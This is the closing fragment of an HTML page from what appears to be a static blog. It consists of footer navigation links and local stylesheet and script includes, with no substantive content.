          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/categories/">Category</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/atom.xml">RSS</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


    
<script src="/lib/jquery/jquery.min.js"></script>


<script src="/js/main.js"></script>




</body>
</html>
